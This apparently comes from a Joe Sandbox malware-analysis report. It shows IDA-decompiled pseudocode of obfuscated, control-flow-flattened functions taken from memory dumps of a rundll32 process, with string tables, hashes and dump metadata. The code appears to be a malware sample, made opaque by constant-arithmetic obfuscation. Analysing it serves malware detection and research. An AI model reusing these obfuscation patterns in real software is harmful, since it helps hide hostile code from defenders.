				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _v1736;
				unsigned int _v1740;
				signed int _v1744;
				signed int _v1748;
				unsigned int _v1752;
				signed int _v1756;
				signed int _v1760;
				signed int _v1764;
				signed int _v1768;
				signed int _v1772;
				signed int _v1776;
				signed int _v1780;
				signed int _v1784;
				signed int _v1788;
				signed int _v1792;
				signed int _v1796;
				signed int _v1800;
				signed int _v1804;
				signed int _v1808;
				signed int _v1812;
				signed int _v1816;
				signed int _v1820;
				signed int _v1824;
				void* _t552;
				void* _t553;
				signed int _t564;
				signed int _t570;
				signed int _t579;
				signed int _t590;
				signed int _t591;
				signed int _t592;
				signed int _t593;
				signed int _t594;
				signed int _t595;
				signed int _t596;
				signed int _t597;
				signed int _t598;
				char* _t613;
				void* _t615;
				void* _t647;
				signed int _t648;
				signed int _t649;
				signed int _t651;
				void* _t654;
				void* _t655;
				void* _t658;

				_v1604 = __edx;
				_v1600 = __ecx;
				_v1568 = _v1568 & 0x00000000;
				_v1576 = 0x3cc734;
				_v1572 = 0x71a41c;
				_v1608 = 0x3729;
				_v1608 = _v1608 * 0x16;
				_t649 = 0x3869a6dc;
				_v1608 = _v1608 ^ 0x0004bdaf;
				_v1652 = 0x78ac;
				_v1652 = _v1652 + 0xffff4506;
				_v1652 = _v1652 ^ 0xffff9627;
				_v1760 = 0xe2e3;
				_v1760 = _v1760 + 0xffff57ea;
				_v1760 = _v1760 | 0x0709d11d;
				_v1760 = _v1760 + 0xffff5608;
				_v1760 = _v1760 ^ 0x07093b35;
				_v1824 = 0x209e;
				_v1824 = _v1824 | 0x01a4e74d;
				_v1824 = _v1824 << 4;
				_v1824 = _v1824 + 0xffffc4ad;
				_v1824 = _v1824 ^ 0x1a4e3329;
				_v1636 = 0xb603;
				_v1636 = _v1636 >> 0xb;
				_v1636 = _v1636 ^ 0x00006b55;
				_v1812 = 0x7008;
				_v1812 = _v1812 ^ 0xf49ad265;
				_v1812 = _v1812 + 0xffffde22;
				_v1812 = _v1812 + 0xd3ad;
				_v1812 = _v1812 ^ 0xf49b25a7;
				_v1700 = 0x835d;
				_v1700 = _v1700 >> 8;
				_v1700 = _v1700 + 0xffffa609;
				_v1700 = _v1700 ^ 0xffffd2b3;
				_v1708 = 0x3ad;
				_v1708 = _v1708 << 0xe;
				_v1708 = _v1708 ^ 0xb8ddb9ae;
				_v1708 = _v1708 ^ 0xb836e296;
				_v1820 = 0xf7f7;
				_v1820 = _v1820 ^ 0xedcbef50;
				_v1820 = _v1820 + 0x117c;
				_v1820 = _v1820 ^ 0x1a37088d;
				_v1820 = _v1820 ^ 0xf7fc1c6b;
				_v1716 = 0x8203;
				_t590 = 0x22;
				_v1716 = _v1716 * 0x53;
				_v1716 = _v1716 | 0xd2646e33;
				_v1716 = _v1716 ^ 0xd26e02a9;
				_v1804 = 0xde4c;
				_v1804 = _v1804 + 0x12e8;
				_v1804 = _v1804 + 0x109c;
				_v1804 = _v1804 + 0xffffbb9c;
				_v1804 = _v1804 ^ 0x0000a7ac;
				_v1612 = 0xe5af;
				_v1612 = _v1612 + 0xffff12ef;
				_v1612 = _v1612 ^ 0xffffa3c5;
				_v1788 = 0x767e;
				_v1788 = _v1788 / _t590;
				_v1788 = _v1788 << 0xb;
				_v1788 = _v1788 << 1;
				_v1788 = _v1788 ^ 0x0037b1f2;
				_v1796 = 0x3cc7;
				_v1796 = _v1796 + 0x6544;
				_t591 = 6;
				_v1796 = _v1796 / _t591;
				_v1796 = _v1796 * 0x2f;
				_v1796 = _v1796 ^ 0x0004f0b5;
				_v1756 = 0x18a9;
				_v1756 = _v1756 >> 0xa;
				_v1756 = _v1756 ^ 0x485ec199;
				_v1756 = _v1756 | 0x10b032a0;
				_v1756 = _v1756 ^ 0x58fea489;
				_v1764 = 0x3ef7;
				_v1764 = _v1764 ^ 0x8490281a;
				_v1764 = _v1764 << 7;
				_v1764 = _v1764 + 0xffffac29;
				_v1764 = _v1764 ^ 0x480b6b9f;
				_v1772 = 0xa54f;
				_v1772 = _v1772 << 0xe;
				_v1772 = _v1772 >> 3;
				_v1772 = _v1772 + 0xffff107e;
				_v1772 = _v1772 ^ 0x05299e66;
				_v1616 = 0xac86;
				_v1616 = _v1616 + 0xeb9b;
				_v1616 = _v1616 ^ 0x0001fc2d;
				_v1780 = 0x1c9e;
				_v1780 = _v1780 + 0xffff92f3;
				_v1780 = _v1780 << 0xb;
				_t592 = 0x32;
				_v1780 = _v1780 * 0x61;
				_v1780 = _v1780 ^ 0x0c2fed9f;
				_v1692 = 0xbfce;
				_v1692 = _v1692 * 0x74;
				_v1692 = _v1692 * 0x7a;
				_v1692 = _v1692 ^ 0x296b682e;
				_v1624 = 0x4aa7;
				_v1624 = _v1624 + 0xffffd2b2;
				_v1624 = _v1624 ^ 0x00003f66;
				_v1740 = 0x5f97;
				_v1740 = _v1740 << 3;
				_v1740 = _v1740 >> 0xb;
				_v1740 = _v1740 + 0x8f5f;
				_v1740 = _v1740 ^ 0x0000a0d8;
				_v1668 = 0xc189;
				_v1668 = _v1668 << 5;
				_v1668 = _v1668 ^ 0xa10e877e;
				_v1668 = _v1668 ^ 0xa116de53;
				_v1676 = 0xd3a5;
				_v1676 = _v1676 << 4;
				_v1676 = _v1676 >> 0xb;
				_v1676 = _v1676 ^ 0x00003141;
				_v1656 = 0x3e6f;
				_v1656 = _v1656 << 7;
				_v1656 = _v1656 ^ 0x001f11d2;
				_v1688 = 0xc680;
				_v1688 = _v1688 >> 3;
				_v1688 = _v1688 + 0x3311;
				_v1688 = _v1688 ^ 0x000003d8;
				_v1808 = 0x746f;
				_v1808 = _v1808 * 0x13;
				_v1808 = _v1808 ^ 0x7e48992b;
				_v1808 = _v1808 ^ 0x60ab5525;
				_v1808 = _v1808 ^ 0x1eeb5b5f;
				_v1712 = 0x15e7;
				_v1712 = _v1712 + 0x6af3;
				_v1712 = _v1712 + 0xd59b;
				_v1712 = _v1712 ^ 0x000120a5;
				_v1768 = 0x28c2;
				_v1768 = _v1768 >> 0xd;
				_v1768 = _v1768 + 0x2712;
				_v1768 = _v1768 ^ 0x07349c13;
				_v1768 = _v1768 ^ 0x07349474;
				_v1704 = 0x10fc;
				_v1704 = _v1704 / _t592;
				_v1704 = _v1704 << 3;
				_v1704 = _v1704 ^ 0x00004238;
				_v1800 = 0x184a;
				_v1800 = _v1800 + 0xffff99ad;
				_v1800 = _v1800 ^ 0xcc4ae956;
				_v1800 = _v1800 + 0xa9c1;
				_v1800 = _v1800 ^ 0x33b67127;
				_v1744 = 0x179e;
				_v1744 = _v1744 + 0xffff74c4;
				_v1744 = _v1744 | 0xd516901d;
				_v1744 = _v1744 ^ 0x9db0741f;
				_v1744 = _v1744 ^ 0x624ff6d2;
				_v1752 = 0x9363;
				_v1752 = _v1752 | 0xf786f6d1;
				_t593 = 0xa;
				_v1752 = _v1752 / _t593;
				_v1752 = _v1752 >> 5;
				_v1752 = _v1752 ^ 0x00c62888;
				_v1672 = 0x1bee;
				_v1672 = _v1672 + 0x7e36;
				_v1672 = _v1672 + 0xffff985d;
				_v1672 = _v1672 ^ 0x00003202;
				_v1620 = 0x8753;
				_t594 = 0x21;
				_v1620 = _v1620 * 0x2e;
				_v1620 = _v1620 ^ 0x00180c0f;
				_v1792 = 0xc17f;
				_v1792 = _v1792 >> 2;
				_v1792 = _v1792 + 0xffff6cdc;
				_v1792 = _v1792 << 1;
				_v1792 = _v1792 ^ 0xffff3724;
				_v1724 = 0xedd7;
				_v1724 = _v1724 + 0xa1ff;
				_v1724 = _v1724 + 0xcda9;
				_v1724 = _v1724 ^ 0x00024839;
				_v1784 = 0xba9c;
				_v1784 = _v1784 / _t594;
				_v1784 = _v1784 + 0xffff5d38;
				_t595 = 0x17;
				_v1784 = _v1784 * 0x45;
				_v1784 = _v1784 ^ 0xffd5c86c;
				_v1736 = 0x93;
				_v1736 = _v1736 >> 7;
				_v1736 = _v1736 / _t595;
				_v1736 = _v1736 ^ 0x00006ab8;
				_v1628 = 0x276d;
				_t596 = 0x68;
				_v1628 = _v1628 / _t596;
				_v1628 = _v1628 ^ 0x00000861;
				_v1728 = 0x2eb2;
				_t597 = 0x4f;
				_v1728 = _v1728 / _t597;
				_v1728 = _v1728 + 0x5604;
				_v1728 = _v1728 ^ 0x00004423;
				_v1732 = 0x27f2;
				_v1732 = _v1732 ^ 0x3ac346ca;
				_v1732 = _v1732 >> 2;
				_v1732 = _v1732 ^ 0x0eb0faa5;
				_v1664 = 0xcef2;
				_v1664 = _v1664 + 0xfffff6e2;
				_v1664 = _v1664 ^ 0x0000a230;
				_v1632 = 0x1d36;
				_v1632 = _v1632 >> 4;
				_v1632 = _v1632 ^ 0x00002ec0;
				_v1644 = 0x1ff5;
				_v1644 = _v1644 << 5;
				_v1644 = _v1644 ^ 0x0003b8ff;
				_v1776 = 0x2b67;
				_t598 = 0x44;
				_v1776 = _v1776 * 0x26;
				_v1776 = _v1776 >> 1;
				_v1776 = _v1776 << 9;
				_v1776 = _v1776 ^ 0x067150e1;
				_v1748 = 0x6691;
				_v1748 = _v1748 + 0xffff6f52;
				_v1748 = _v1748 + 0xfffff72c;
				_v1748 = _v1748 + 0x945b;
				_v1748 = _v1748 ^ 0x00005e83;
				_v1660 = 0xb6a0;
				_v1660 = _v1660 + 0x5077;
				_v1660 = _v1660 ^ 0x00013d7f;
				_v1680 = 0x9a0c;
				_v1680 = _v1680 + 0x1ba;
				_v1680 = _v1680 << 9;
				_v1680 = _v1680 ^ 0x0137abe4;
				_v1720 = 0x9003;
				_v1720 = _v1720 ^ 0xe8061da0;
				_v1720 = _v1720 >> 0xe;
				_v1720 = _v1720 ^ 0x0003e70e;
				_v1696 = 0x225f;
				_v1696 = _v1696 + 0xffff757f;
				_v1696 = _v1696 | 0x5384c054;
				_v1696 = _v1696 ^ 0xffff974f;
				_v1816 = 0xbb4b;
				_v1816 = _v1816 * 0x5d;
				_v1816 = _v1816 / _t598;
				_v1816 = _v1816 >> 3;
				_v1816 = _v1816 ^ 0x00005120;
				_v1640 = 0x4988;
				_v1640 = _v1640 | 0xfa9f0bea;
				_v1640 = _v1640 ^ 0xfa9f78d4;
				_v1648 = 0x6a0a;
				_v1648 = _v1648 << 9;
				_v1648 = _v1648 ^ 0x00d43e74;
				_v1684 = 0x375;
				_v1684 = _v1684 * 0x2b;
				_v1684 = _v1684 << 7;
				_v1684 = _v1684 ^ 0x005a5380;
				_t552 = E00440186();
				_t588 = _v1604;
				_t654 = _t552;
				_t648 = _v1604;
				while(1) {
					L1:
					_t553 = 0x2a6416b7;
					do {
						while(1) {
							L2:
							_t658 = _t649 - _t553;
							if(_t658 > 0) {
								break;
							}
							if(_t658 == 0) {
								_push(0x431070);
								_push(_v1744);
								_push(_v1800);
								E0044BAEC(0x104, __eflags, _v1672, E00435DFC(_v1768, _v1704, __eflags),  &_v1564, _v1620, _v1792,  &_v1044, _t588,  &_v524);
								E00440D6D(_v1724, _v1784, _v1736, _t573);
								_t655 = _t655 + 0x34;
								_t649 = 0x269ce6ac;
								while(1) {
									L1:
									_t553 = 0x2a6416b7;
									goto L2;
								}
							} else {
								if(_t649 == 0x64fcc40) {
									_t579 = E0044135B(_v1688, _v1808, _v1592, _v1596, _v1712);
									_t588 = _t579;
									_t655 = _t655 + 0xc;
									__eflags = _t579;
									_t553 = 0x2a6416b7;
									_t649 =  !=  ? 0x2a6416b7 : 0x30528e15;
									continue;
								} else {
									if(_t649 == 0x16d63096) {
										return E0043DE81(_v1640, _t648, _v1648);
									}
									if(_t649 == 0x1795f4ce) {
										E0043DE81(_v1644, _t588, _v1776);
										_t649 = 0x30528e15;
										while(1) {
											L1:
											_t553 = 0x2a6416b7;
											goto L2;
										}
									} else {
										if(_t649 == 0x1c05f6e2) {
											_push( &_v1564);
											_push(0x431000);
											E0044B165(_v1600, _v1604);
											asm("sbb esi, esi");
											_t651 = _t649 & 0x21272103;
											__eflags = _t651;
											L13:
											_t649 = _t651 + 0x16d63096;
											while(1) {
												L1:
												_t553 = 0x2a6416b7;
												goto L2;
											}
										} else {
											if(_t649 == 0x1ef0e1ab) {
												E0043F1ED(_v1680, _v1720, _v1696, _v1816, _v1588);
												_t655 = _t655 + 0xc;
												_t649 = 0x2b2354e1;
												while(1) {
													L1:
													_t553 = 0x2a6416b7;
													goto L2;
												}
											} else {
												_t664 = _t649 - 0x269ce6ac;
												if(_t649 != 0x269ce6ac) {
													goto L28;
												} else {
													_push(1);
													_push( &_v1044);
													_push(_v1632);
													_push(_v1664);
													_push(_v1732);
													_push(_v1728);
													_push(0);
													_push(0);
													E00436417(_v1628, _t664);
													_t655 = _t655 + 0x20;
													_t649 = 0x1795f4ce;
													while(1) {
														L1:
														_t553 = 0x2a6416b7;
														goto L2;
													}
												}
											}
										}
									}
								}
							}
							L18:
							__eflags = _t649 - 0x2bf7e78d;
							if(_t649 == 0x2bf7e78d) {
								E004357D4(_v1668,  &_v1596, _v1676, _v1656,  &_v1588);
								_t655 = _t655 + 0x10;
								asm("sbb esi, esi");
								_t649 = (_t649 & 0xe75eea95) + 0x1ef0e1ab;
								while(1) {
									L1:
									_t553 = 0x2a6416b7;
									goto L2;
								}
							}
							__eflags = _t649 - 0x30528e15;
							if(_t649 == 0x30528e15) {
								E0043DE81(_v1748, _v1596, _v1660);
								_pop(_t613);
								_t649 = 0x1ef0e1ab;
								while(1) {
									L1:
									_t553 = 0x2a6416b7;
									goto L2;
								}
							}
							__eflags = _t649 - 0x37fd5199;
							if(_t649 == 0x37fd5199) {
								_v1584 = E00443587();
								_t564 = E0044232B(_v1788, _t563, _v1796);
								_pop(_t615);
								_v1580 = 2 + _t564 * 2;
								_t613 =  &_v1588;
								E0043446D(_t613, _v1756, _t615, _v1764, _v1772, _t654, _t654, _v1684, _v1616, _v1780, _t654, _v1692, _v1624);
								_t655 = _t655 + 0x30;
								asm("sbb esi, esi");
								_t651 = _t649 & 0x1521b6f7;
								goto L13;
							}
							__eflags = _t649 - 0x3869a6dc;
							if(_t649 != 0x3869a6dc) {
								goto L28;
							}
							_t647 = 0x50;
							_t570 = E004354FB(_t647);
							_t648 = _t570;
							_t613 = _t613;
							__eflags = _t648;
							if(_t648 != 0) {
								_push(_t613);
								E0043471A(_v1608,  &_v524, _v1812, _v1700, _v1708, _v1820, _v1716);
								_t655 = _t655 + 0x20;
								_t649 = 0x1c05f6e2;
								goto L1;
							}
							return _t570;
						}
						__eflags = _t649 - 0x2b2354e1;
						if(_t649 == 0x2b2354e1) {
							_t649 = 0x1392add6;
							 *((intOrPtr*)(_t648 + 0x44)) = _v1600;
							 *_t648 =  *0x451084;
							_t553 = 0x2a6416b7;
							 *0x451084 = _t648;
							goto L28;
						}
						goto L18;
						L28:
						__eflags = _t649 - 0x1392add6;
					} while (__eflags != 0);
					return _t553;
				}
			}

0x0043adb9
0x0043adc0
0x0043adc7
0x0043adcf
0x0043adda
0x0043ade5
0x0043adf8
0x0043adff
0x0043ae04
0x0043ae0f
0x0043ae1a
0x0043ae25
0x0043ae30
0x0043ae38
0x0043ae40
0x0043ae48
0x0043ae50
0x0043ae58
0x0043ae60
0x0043ae68
0x0043ae6d
0x0043ae75
0x0043ae7d
0x0043ae88
0x0043ae90
0x0043ae9b
0x0043aea3
0x0043aeab
0x0043aeb3
0x0043aebb
0x0043aec3
0x0043aece
0x0043aed6
0x0043aee1
0x0043aeec
0x0043aef7
0x0043aeff
0x0043af0a
0x0043af15
0x0043af1d
0x0043af25
0x0043af2d
0x0043af35
0x0043af3d
0x0043af54
0x0043af55
0x0043af5c
0x0043af67
0x0043af72
0x0043af7a
0x0043af82
0x0043af8a
0x0043af92
0x0043af9a
0x0043afa5
0x0043afb0
0x0043afbb
0x0043afcb
0x0043afd1
0x0043afd6
0x0043afda
0x0043afe2
0x0043afea
0x0043aff6
0x0043aff9
0x0043b002
0x0043b006
0x0043b010
0x0043b018
0x0043b01d
0x0043b025
0x0043b02d
0x0043b035
0x0043b03d
0x0043b045
0x0043b04a
0x0043b052
0x0043b05a
0x0043b062
0x0043b067
0x0043b06c
0x0043b074
0x0043b07c
0x0043b087
0x0043b092
0x0043b09d
0x0043b0a5
0x0043b0ad
0x0043b0b9
0x0043b0ba
0x0043b0be
0x0043b0c6
0x0043b0d9
0x0043b0e8
0x0043b0ef
0x0043b0fa
0x0043b105
0x0043b110
0x0043b11b
0x0043b123
0x0043b128
0x0043b12d
0x0043b135
0x0043b13d
0x0043b148
0x0043b150
0x0043b15b
0x0043b166
0x0043b171
0x0043b179
0x0043b181
0x0043b18c
0x0043b197
0x0043b19f
0x0043b1aa
0x0043b1b5
0x0043b1bd
0x0043b1c8
0x0043b1d3
0x0043b1e0
0x0043b1e4
0x0043b1ec
0x0043b1f4
0x0043b1fc
0x0043b207
0x0043b212
0x0043b21d
0x0043b228
0x0043b230
0x0043b235
0x0043b23d
0x0043b245
0x0043b24d
0x0043b261
0x0043b268
0x0043b270
0x0043b27b
0x0043b283
0x0043b28b
0x0043b293
0x0043b29d
0x0043b2a5
0x0043b2ad
0x0043b2b5
0x0043b2bd
0x0043b2c5
0x0043b2cd
0x0043b2d5
0x0043b2e3
0x0043b2e8
0x0043b2ee
0x0043b2f3
0x0043b2fb
0x0043b306
0x0043b311
0x0043b31c
0x0043b327
0x0043b33a
0x0043b33d
0x0043b344
0x0043b34f
0x0043b357
0x0043b35c
0x0043b364
0x0043b368
0x0043b370
0x0043b378
0x0043b380
0x0043b388
0x0043b390
0x0043b3a0
0x0043b3a4
0x0043b3b1
0x0043b3b4
0x0043b3b8
0x0043b3c0
0x0043b3c8
0x0043b3d5
0x0043b3d9
0x0043b3e1
0x0043b3f3
0x0043b3f8
0x0043b401
0x0043b40c
0x0043b418
0x0043b41b
0x0043b41f
0x0043b427
0x0043b42f
0x0043b437
0x0043b43f
0x0043b444
0x0043b44c
0x0043b457
0x0043b462
0x0043b46d
0x0043b478
0x0043b480
0x0043b48b
0x0043b498
0x0043b4a0
0x0043b4ab
0x0043b4ba
0x0043b4bb
0x0043b4bf
0x0043b4c3
0x0043b4c8
0x0043b4d0
0x0043b4d8
0x0043b4e0
0x0043b4e8
0x0043b4f0
0x0043b4f8
0x0043b503
0x0043b50e
0x0043b519
0x0043b524
0x0043b52f
0x0043b537
0x0043b542
0x0043b54a
0x0043b552
0x0043b557
0x0043b55f
0x0043b56a
0x0043b575
0x0043b580
0x0043b58b
0x0043b598
0x0043b5a2
0x0043b5a6
0x0043b5ab
0x0043b5b3
0x0043b5be
0x0043b5c9
0x0043b5d4
0x0043b5df
0x0043b5e7
0x0043b5f2
0x0043b605
0x0043b60c
0x0043b614
0x0043b62a
0x0043b62f
0x0043b636
0x0043b638
0x0043b63f
0x0043b63f
0x0043b63f
0x0043b644
0x0043b644
0x0043b644
0x0043b644
0x0043b646
0x00000000
0x00000000
0x0043b64c
0x0043b79d
0x0043b7a2
0x0043b7a6
0x0043b7f4
0x0043b80c
0x0043b811
0x0043b814
0x0043b63f
0x0043b63f
0x0043b63f
0x00000000
0x0043b63f
0x0043b652
0x0043b658
0x0043b77f
0x0043b784
0x0043b786
0x0043b789
0x0043b790
0x0043b795
0x00000000
0x0043b65e
0x0043b664
0x00000000
0x0043b9e6
0x0043b670
0x0043b74f
0x0043b755
0x0043b63f
0x0043b63f
0x0043b63f
0x00000000
0x0043b63f
0x0043b676
0x0043b67c
0x0043b720
0x0043b721
0x0043b726
0x0043b72e
0x0043b731
0x0043b731
0x0043b737
0x0043b737
0x0043b63f
0x0043b63f
0x0043b63f
0x00000000
0x0043b63f
0x0043b682
0x0043b688
0x0043b6f9
0x0043b6fe
0x0043b701
0x0043b63f
0x0043b63f
0x0043b63f
0x00000000
0x0043b63f
0x0043b68a
0x0043b68a
0x0043b690
0x00000000
0x0043b696
0x0043b696
0x0043b69f
0x0043b6a0
0x0043b6a7
0x0043b6ae
0x0043b6b5
0x0043b6c3
0x0043b6c5
0x0043b6c7
0x0043b6cc
0x0043b6cf
0x0043b63f
0x0043b63f
0x0043b63f
0x00000000
0x0043b63f
0x0043b63f
0x0043b690
0x0043b688
0x0043b67c
0x0043b670
0x0043b658
0x0043b82a
0x0043b82a
0x0043b830
0x0043b985
0x0043b98a
0x0043b98f
0x0043b997
0x0043b63f
0x0043b63f
0x0043b63f
0x00000000
0x0043b63f
0x0043b63f
0x0043b836
0x0043b83c
0x0043b94c
0x0043b951
0x0043b952
0x0043b63f
0x0043b63f
0x0043b63f
0x00000000
0x0043b63f
0x0043b63f
0x0043b842
0x0043b848
0x0043b8ce
0x0043b8d5
0x0043b8da
0x0043b8f5
0x0043b91c
0x0043b923
0x0043b928
0x0043b92d
0x0043b92f
0x00000000
0x0043b92f
0x0043b84a
0x0043b850
0x00000000
0x00000000
0x0043b864
0x0043b865
0x0043b86a
0x0043b86c
0x0043b86d
0x0043b86f
0x0043b875
0x0043b8a2
0x0043b8a7
0x0043b8aa
0x00000000
0x0043b8aa
0x0043b9f1
0x0043b9f1
0x0043b81e
0x0043b824
0x0043b9a9
0x0043b9ae
0x0043b9b6
0x0043b9b8
0x0043b9bd
0x00000000
0x0043b9bd
0x00000000
0x0043b9c3
0x0043b9c3
0x0043b9c3
0x00000000
0x0043b644

Strings

6~, xrefs: 0043B306
8B, xrefs: 0043B270
ot, xrefs: 0043B1D3
Uk, xrefs: 0043AE90
o>, xrefs: 0043B18C
wP, xrefs: 0043B503
)7, xrefs: 0043ADE5
_", xrefs: 0043B55F
g+, xrefs: 0043B4AB
De, xrefs: 0043AFEA
.hk), xrefs: 0043B0EF
Q, xrefs: 0043B5AB
T#+, xrefs: 0043B81E
T#+, xrefs: 0043B701
m', xrefs: 0043B3E1
j, xrefs: 0043B5D4
#D, xrefs: 0043B427
~v, xrefs: 0043AFBB
A1, xrefs: 0043B181

Memory Dump Source

Source File: 00000007.00000002.2330983345.0000000000430000.00000040.00020000.sdmp, Offset: 00430000, based on PE: true

Associated: 00000007.00000002.2331018367.0000000000450000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2331022756.0000000000452000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_430000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: j$ Q$#D$)7$.hk)$6~$8B$A1$De$Uk$_"$g+$m'$o>$ot$wP$~v$T#+$T#+
API String ID: 0-2608984025
Opcode ID: 7491639d54f1d9461530941fd177806f2aad7b222e2c6934ab748cfa8ecc0fa3
Instruction ID: 3357ca49bf5ea7dede38a22a4a71466a516f64dce379e270b546aca54da0fda1
Opcode Fuzzy Hash: 7491639d54f1d9461530941fd177806f2aad7b222e2c6934ab748cfa8ecc0fa3
Instruction Fuzzy Hash: D45214715087818FE374CF25C54AB9BBBE1FB94708F10891EE6D9862A0D7B98949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 0017A323, Relevance: 24.3, Strings: 19, Instructions: 509COMMON

Download Yara Rule

Strings

De, xrefs: 0017A55E
~v, xrefs: 0017A52F
wP, xrefs: 0017AA77
.hk), xrefs: 0017A663
j, xrefs: 0017AB48
#D, xrefs: 0017A99B
8B, xrefs: 0017A7E4
T#+, xrefs: 0017AD92
6~, xrefs: 0017A87A
o>, xrefs: 0017A700
Uk, xrefs: 0017A404
m', xrefs: 0017A955
_", xrefs: 0017AAD3
T#+, xrefs: 0017AC75
g+, xrefs: 0017AA1F
A1, xrefs: 0017A6F5
)7, xrefs: 0017A359
ot, xrefs: 0017A747
Q, xrefs: 0017AB1F

Memory Dump Source

Source File: 00000007.00000002.2330819639.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_170000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: j$ Q$#D$)7$.hk)$6~$8B$A1$De$Uk$_"$g+$m'$o>$ot$wP$~v$T#+$T#+
API String ID: 0-2608984025
Opcode ID: 963a99a93fb689d0f71fdebccc791c46f5cda195b7edc031de167631b906f063
Instruction ID: 549039e6a93315c91eaa233f1f15a29487813e9ffe57e57648a4cdf14c97a886
Opcode Fuzzy Hash: 963a99a93fb689d0f71fdebccc791c46f5cda195b7edc031de167631b906f063
Instruction Fuzzy Hash: 2252F0725083818BE378CF24C949B9BBBF1BBD4318F508A1DE5D9962A0D7B58949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 00189665, Relevance: 20.4, Strings: 16, Instructions: 365COMMON

Download Yara Rule

Strings

l#$+, xrefs: 00189962
%8, xrefs: 0018987B
-[, xrefs: 001899C7
6, xrefs: 001898A9
wK, xrefs: 00189783
9;, xrefs: 00189B90
_u, xrefs: 001898D2
[(%, xrefs: 00189A5B
p, xrefs: 00189AC5
W>, xrefs: 001898F0
a, xrefs: 00189A6E
I&F, xrefs: 0018966B
g%, xrefs: 00189804
mnf, xrefs: 00189678
T5, xrefs: 001899F7
tz, xrefs: 00189AFA

Memory Dump Source

Source File: 00000007.00000002.2330819639.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_170000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 6$%8$-[$9;$I&F$T5$W>$[(%$_u$a$g%$l#$+$mnf$tz$wK$p
API String ID: 0-3673879503
Opcode ID: 9fd079df365c0b38c3b7971676b147244cc8a405241a52ec73158a79eff0d458
Instruction ID: 424663b0d04d1cf4730918539cad6c11b5a61b7d934e126a0f444154b47cadcb
Opcode Fuzzy Hash: 9fd079df365c0b38c3b7971676b147244cc8a405241a52ec73158a79eff0d458
Instruction Fuzzy Hash: FA121171508380DFE368DF65C88AA5BFBE1BBC5758F10891DE1D9862A0D7B98948CF43

Uniqueness

Uniqueness Score: -1.00%

Function 00447BBE, Relevance: 18.2, Strings: 14, Instructions: 657
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E00447BBE(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16, intOrPtr* _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
				intOrPtr* _v4;
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				unsigned int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				intOrPtr* _v284;
				intOrPtr* _v288;
				void* __ecx;
				intOrPtr* _t702;
				intOrPtr* _t706;
				intOrPtr* _t709;
				intOrPtr* _t714;
				intOrPtr* _t716;
				intOrPtr _t718;
				void* _t720;
				intOrPtr _t734;
				intOrPtr _t738;
				intOrPtr _t739;
				intOrPtr* _t740;
				intOrPtr _t750;
				void* _t764;
				void* _t815;
				signed int _t832;
				signed int _t833;
				signed int _t834;
				signed int _t835;
				signed int _t836;
				signed int _t837;
				signed int _t838;
				signed int _t839;
				signed int _t840;
				signed int _t841;
				signed int _t842;
				signed int _t843;
				signed int _t844;
				signed int _t845;
				signed int _t846;
				signed int _t847;
				signed int _t848;
				signed int _t849;
				signed int _t850;
				signed int _t851;
				signed int _t852;
				signed int _t853;
				signed int _t855;
				intOrPtr* _t861;
				void* _t863;
				void* _t865;

				_t740 = _a20;
				_push(_a40);
				_push(_a36);
				_v16 = __edx;
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(_t740);
				_push(_a16 & 0x0000ffff);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E00442550(_a16 & 0x0000ffff);
				_v8 = 0x36204f;
				_v20 = 0;
				_t863 =  &_v288 + 0x30;
				_v4 = 0;
				_v272 = 0xdc69;
				_t861 = 0;
				_v272 = _v272 + 0xffff6337;
				_v272 = _v272 + 0xffff179b;
				_t855 = 0x175d2af;
				_v272 = _v272 << 0xa;
				_v272 = _v272 ^ 0xfd5cec00;
				_v204 = 0xa9cd;
				_v204 = _v204 + 0xe741;
				_v204 = _v204 << 0xa;
				_v28 = 0;
				_t832 = 0x3a;
				_v204 = _v204 / _t832;
				_v204 = _v204 ^ 0x001ba8a3;
				_v260 = 0x5d6b;
				_t833 = 0x6f;
				_v260 = _v260 / _t833;
				_t834 = 0x1e;
				_v288 = 0;
				_v260 = _v260 * 0x73;
				_v260 = _v260 * 0x64;
				_v260 = _v260 ^ 0x0025bafc;
				_v116 = 0x8d70;
				_v116 = _v116 * 0x63;
				_v116 = _v116 ^ 0x00363250;
				_v132 = 0x5ee0;
				_v132 = _v132 << 6;
				_v132 = _v132 / _t834;
				_v132 = _v132 ^ 0x00008a66;
				_v172 = 0xa39a;
